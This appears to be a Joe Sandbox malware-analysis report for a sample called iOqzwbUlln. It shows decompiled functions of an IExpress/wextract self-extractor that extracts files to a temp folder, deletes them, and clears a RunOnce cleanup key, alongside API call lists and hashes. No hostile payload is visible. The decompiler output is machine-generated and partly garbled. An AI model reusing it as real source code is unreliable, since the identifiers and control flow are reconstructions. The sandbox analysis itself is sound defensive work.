                                                                                                                                                                                                        0x00e85910
                                                                                                                                                                                                        0x00e85910
                                                                                                                                                                                                        0x00e85918

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00E85534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E858E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00E85534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00E85534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00E85534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E8595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00E85534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00E85963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-1664176527
                                                                                                                                                                                                        • Opcode ID: 4681dcac64904ce9ff416c0e969ca83cee1ccaab67aed56841a59981fae0cf9d
                                                                                                                                                                                                        • Instruction ID: 84c7e0ff842d5f0adff59d72025d1da681cbd4fddeef82253992ef301ecb3226
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4681dcac64904ce9ff416c0e969ca83cee1ccaab67aed56841a59981fae0cf9d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A1156726012106BD7207FBA6C4CAAB7E9DDF86364B141626F51DF31C1CE74880A83A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E851E5(void* __eflags) {
                                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = E00E8468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                                        					if(E00E8468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                        						if(_t5 != 0) {
                                                                                                                                                                                                        							_t6 = E00E844B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                        							LocalFree(_t28);
                                                                                                                                                                                                        							if(_t6 != 6) {
                                                                                                                                                                                                        								 *0xe89124 = 0x800704c7;
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *0xe89124 = 0;
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t28);
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E00E844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                                                        					 *0xe89124 = 0x80070714;
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00E844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xe89124 = E00E86285();
                                                                                                                                                                                                        				goto L10;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        0x00e851fb
                                                                                                                                                                                                        0x00e85207
                                                                                                                                                                                                        0x00e8520b
                                                                                                                                                                                                        0x00e8523c
                                                                                                                                                                                                        0x00e85268
                                                                                                                                                                                                        0x00e85270
                                                                                                                                                                                                        0x00e8528b
                                                                                                                                                                                                        0x00e85293
                                                                                                                                                                                                        0x00e8529c
                                                                                                                                                                                                        0x00e852a6
                                                                                                                                                                                                        0x00e852b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e852b0
                                                                                                                                                                                                        0x00e8529e
                                                                                                                                                                                                        0x00e85279
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8527b
                                                                                                                                                                                                        0x00e85273
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85273
                                                                                                                                                                                                        0x00e8524a
                                                                                                                                                                                                        0x00e85250
                                                                                                                                                                                                        0x00e85256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e85256
                                                                                                                                                                                                        0x00e85219
                                                                                                                                                                                                        0x00e85223
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E82F4D,?,00000002,00000000), ref: 00E85201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00E85250
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                          • Part of subcall function 00E86285: GetLastError.KERNEL32(00E85BBC), ref: 00E86285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 46df5d5013d633d3a05103244814c358e15a048cce36eed558a69ab21a341e27
                                                                                                                                                                                                        • Instruction ID: 7f3358726c9ab19cea4b929dfd24ac4ce688804b864e1e48438091cd6660ddec
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46df5d5013d633d3a05103244814c358e15a048cce36eed558a69ab21a341e27
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3411E6B2641201AFE3157BB25C89B3B61EDDBC8354B15543AB60EF51E0DE789C015325
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E00E852B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR** _t31;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 = __edi;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_t31 =  *0xe891e0; // 0x688290
                                                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t29 = _t31;
                                                                                                                                                                                                        						if( *0xe88a24 == 0 &&  *0xe89a30 == 0) {
                                                                                                                                                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                        							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t31 = _t31[1];
                                                                                                                                                                                                        						LocalFree( *_t29);
                                                                                                                                                                                                        						LocalFree(_t29);
                                                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                                                        					_pop(_t28);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 =  *0xe88a20; // 0x0
                                                                                                                                                                                                        				_pop(_t32);
                                                                                                                                                                                                        				if(_t11 != 0 &&  *0xe88a24 == 0 &&  *0xe89a30 == 0) {
                                                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                                                        					E00E81781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        					if(( *0xe89a34 & 0x00000020) != 0) {
                                                                                                                                                                                                        						E00E865E8( &_v268);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                        					_t22 =  &_v268;
                                                                                                                                                                                                        					E00E82390( &_v268);
                                                                                                                                                                                                        					_t11 =  *0xe88a20; // 0x0
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *0xe89a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                        					_t11 = E00E81FE1(_t22); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0xe88a20 =  *0xe88a20 & 0x00000000;
                                                                                                                                                                                                        				return E00E86CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x00e852b6
                                                                                                                                                                                                        0x00e852b6
                                                                                                                                                                                                        0x00e852b6
                                                                                                                                                                                                        0x00e852c1
                                                                                                                                                                                                        0x00e852c8
                                                                                                                                                                                                        0x00e852cb
                                                                                                                                                                                                        0x00e852cc
                                                                                                                                                                                                        0x00e852d4
                                                                                                                                                                                                        0x00e852d6
                                                                                                                                                                                                        0x00e852d7
                                                                                                                                                                                                        0x00e852de
                                                                                                                                                                                                        0x00e852e0
                                                                                                                                                                                                        0x00e852f2
                                                                                                                                                                                                        0x00e852fa
                                                                                                                                                                                                        0x00e852fa
                                                                                                                                                                                                        0x00e85302
                                                                                                                                                                                                        0x00e85305
                                                                                                                                                                                                        0x00e8530c
                                                                                                                                                                                                        0x00e85312
                                                                                                                                                                                                        0x00e85316
                                                                                                                                                                                                        0x00e85316
                                                                                                                                                                                                        0x00e85317
                                                                                                                                                                                                        0x00e8531c
                                                                                                                                                                                                        0x00e8531f
                                                                                                                                                                                                        0x00e85333
                                                                                                                                                                                                        0x00e85345
                                                                                                                                                                                                        0x00e85351
                                                                                                                                                                                                        0x00e85359
                                                                                                                                                                                                        0x00e85359
                                                                                                                                                                                                        0x00e85363
                                                                                                                                                                                                        0x00e85369
                                                                                                                                                                                                        0x00e8536f
                                                                                                                                                                                                        0x00e85374
                                                                                                                                                                                                        0x00e85374
                                                                                                                                                                                                        0x00e85381
                                                                                                                                                                                                        0x00e85387
                                                                                                                                                                                                        0x00e85387
                                                                                                                                                                                                        0x00e8538f
                                                                                                                                                                                                        0x00e853a0

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(00688290,00000080,?,00000000), ref: 00E852F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(00688290), ref: 00E852FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(00688290,?,00000000), ref: 00E85305
                                                                                                                                                                                                        • LocalFree.KERNEL32(00688290), ref: 00E8530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00E811FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E85363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E85334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-305352358
                                                                                                                                                                                                        • Opcode ID: 7f509d5db8fcba70bbcd1f1c6824cd6f58a73a988785d942cb6e94a16ce807f4
                                                                                                                                                                                                        • Instruction ID: 4b8d3cd268664467a2f0f7a0e5bc983c540a8a332824182aee2dd1bf2b54411e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f509d5db8fcba70bbcd1f1c6824cd6f58a73a988785d942cb6e94a16ce807f4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA21F332901A04DFDB38BF21DD49B6977B4BB00744F4821AAE84E761A5CFB05C8CCB40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E81FE1(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				if( *0xe88530 != 0) {
                                                                                                                                                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                                        						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                        						return RegCloseKey(_v8);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x00e81fee
                                                                                                                                                                                                        0x00e82005
                                                                                                                                                                                                        0x00e8200d
                                                                                                                                                                                                        0x00e82017
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82020
                                                                                                                                                                                                        0x00e8200d
                                                                                                                                                                                                        0x00e82029

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00E8538C,?,?,00E8538C), ref: 00E82005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(00E8538C,wextract_cleanup0,?,?,00E8538C), ref: 00E82017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00E8538C,?,?,00E8538C), ref: 00E82020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                        • API String ID: 849931509-702805525
                                                                                                                                                                                                        • Opcode ID: 424b1a6fc58d257fdc0f7494b0d6d36ae430113c13e81eaa2859e7f961501f3a
                                                                                                                                                                                                        • Instruction ID: 13dc5e2feca0eef793e60949918e86bcf77844a57f70d9bf06356bd506348fab
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 424b1a6fc58d257fdc0f7494b0d6d36ae430113c13e81eaa2859e7f961501f3a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8E04F30950318BFE722ABD2ED0AF597B6AE701745F6401A9BE0CB0070EB615A18D705
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00E84CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				long _t35;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				struct HWND__* _t37;
                                                                                                                                                                                                        				long _t38;
                                                                                                                                                                                                        				long _t39;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				long _t44;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				long _t46;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				long _t51;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				long _t59;
                                                                                                                                                                                                        				char* _t63;
                                                                                                                                                                                                        				long _t64;
                                                                                                                                                                                                        				CHAR* _t71;
                                                                                                                                                                                                        				CHAR* _t74;
                                                                                                                                                                                                        				int _t75;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                        				_v8 = _t30;
                                                                                                                                                                                                        				_t75 = _a8;
                                                                                                                                                                                                        				if( *0xe891d8 == 0) {
                                                                                                                                                                                                        					_t32 = _a4;
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                                        						_t33 = E00E84E99(_t75);
                                                                                                                                                                                                        						L35:
                                                                                                                                                                                                        						return E00E86CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t35 = _t32 - 1;
                                                                                                                                                                                                        					__eflags = _t35;
                                                                                                                                                                                                        					if(_t35 == 0) {
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						_t33 = 0;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t36 = _t35 - 1;
                                                                                                                                                                                                        					__eflags = _t36;
                                                                                                                                                                                                        					if(_t36 == 0) {
                                                                                                                                                                                                        						_t37 =  *0xe88584; // 0x0
                                                                                                                                                                                                        						__eflags = _t37;
                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t54 = 0xe891e4;
                                                                                                                                                                                                        						_t58 = 0xe891e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t38 =  *_t58;
                                                                                                                                                                                                        							_t58 =  &(_t58[1]);
                                                                                                                                                                                                        							__eflags = _t38;
                                                                                                                                                                                                        						} while (_t38 != 0);
                                                                                                                                                                                                        						_t59 = _t58 - 0xe891e5;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t73 =  &(_t71[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t39 =  *_t71;
                                                                                                                                                                                                        							_t71 =  &(_t71[1]);
                                                                                                                                                                                                        							__eflags = _t39;
                                                                                                                                                                                                        						} while (_t39 != 0);
                                                                                                                                                                                                        						_t69 = _t71 - _t73;
                                                                                                                                                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							L3:
                                                                                                                                                                                                        							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xe891e4;
                                                                                                                                                                                                        						_t30 = E00E84702( &_v268, 0xe891e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t41 = E00E8476D( &_v268, __eflags);
                                                                                                                                                                                                        						__eflags = _t41;
                                                                                                                                                                                                        						if(_t41 == 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0x180);
                                                                                                                                                                                                        						_t30 = E00E84980( &_v268, 0x8302); // executed
                                                                                                                                                                                                        						_t75 = _t30;
                                                                                                                                                                                                        						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E00E847E0( &_v268);
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xe893f4 =  *0xe893f4 + 1;
                                                                                                                                                                                                        						_t33 = _t75;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t44 = _t36 - 1;
                                                                                                                                                                                                        					__eflags = _t44;
                                                                                                                                                                                                        					if(_t44 == 0) {
                                                                                                                                                                                                        						_t54 = 0xe891e4;
                                                                                                                                                                                                        						_t63 = 0xe891e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t45 =  *_t63;
                                                                                                                                                                                                        							_t63 =  &(_t63[1]);
                                                                                                                                                                                                        							__eflags = _t45;
                                                                                                                                                                                                        						} while (_t45 != 0);
                                                                                                                                                                                                        						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t64 = _t63 - 0xe891e5;
                                                                                                                                                                                                        						__eflags = _t64;
                                                                                                                                                                                                        						_t69 =  &(_t74[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t46 =  *_t74;
                                                                                                                                                                                                        							_t74 =  &(_t74[1]);
                                                                                                                                                                                                        							__eflags = _t46;
                                                                                                                                                                                                        						} while (_t46 != 0);
                                                                                                                                                                                                        						_t73 = _t74 - _t69;
                                                                                                                                                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xe891e4;
                                                                                                                                                                                                        						_t30 = E00E84702( &_v268, 0xe891e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                        						_t30 = E00E84C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E00E84B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                        						__eflags = _t50;
                                                                                                                                                                                                        						if(_t50 != 0) {
                                                                                                                                                                                                        							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                        							__eflags = _t51;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t51 = 0x80;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t33 = 1;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t30 = _t44 - 1;
                                                                                                                                                                                                        					__eflags = _t30;
                                                                                                                                                                                                        					if(_t30 == 0) {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a4 == 3) {
                                                                                                                                                                                                        					_t30 = E00E84B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                        			}































                                                                                                                                                                                                        0x00e84cd0
                                                                                                                                                                                                        0x00e84cdb
                                                                                                                                                                                                        0x00e84ce0
                                                                                                                                                                                                        0x00e84ce2
                                                                                                                                                                                                        0x00e84cee
                                                                                                                                                                                                        0x00e84cf2
                                                                                                                                                                                                        0x00e84d0e
                                                                                                                                                                                                        0x00e84d0e
                                                                                                                                                                                                        0x00e84d11
                                                                                                                                                                                                        0x00e84e83
